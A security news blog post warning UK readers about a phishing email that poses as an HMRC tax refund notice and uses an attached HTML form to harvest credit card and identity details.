Phishers exploit HMRC tax error refund in UK

Graham Cluley
Graham Cluley
@
@[email protected]
@gcluley

HMRC logo
Tax authorities in the UK are contacting millions of people, telling them that they have paid the wrong amount of tax.

As the BBC reports, the mistakes in tax payment calculations have been uncovered following the introduction of a new computer system.

So, it’s good news for some (who will be receiving an unexpected windfall in the form of a tax rebate) and bad news for others, who will find that they are being asked to make uncomfortable additional payments to the HMRC.

But if you think you had enough to worry about with the possibility of an unexpected extra tax demand, UK internet users are also at risk as scammers exploit the confusion.

Sign up to our free newsletter.
Security news, advice, and tips.

For instance, here’s a message we caught in our spam traps this morning which claimed to come from HMRC with the subject line “You Have An HMRC Refund”:

Bogus HMRC refund email

Part of the email reads:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP

Due to the high volume of refunds you must complete the online application.

Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

In order to process your refund you will need to complete the attached application form.

Attached to the email is a file called Refund-Form.zip, which contains an HTML file called Refund-Form.htm which asks for information including your credit card details, full date of birth, and mother’s maiden name.

Phishing form

If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server. You’re not going to receive a windfall because of this form – you’ve just been phished.

The real HMRC website contains advice about scams like this, and clearly states that they would never customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax.

You have been warned – don’t let your eagerness for a tax refund lead to you throwing caution to the wind.


Graham Cluley is an award-winning keynote speaker who has given presentations around the world about cybersecurity, hackers, and online privacy. A veteran of the computer security industry since the early 1990s, he wrote the first ever version of Dr Solomon's Anti-Virus Toolkit for Windows, makes regular media appearances, and is the co-host of the popular "Smashing Security" podcast. Follow him on Twitter, Mastodon, Threads, Bluesky, or drop him an email.

What do you think? Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.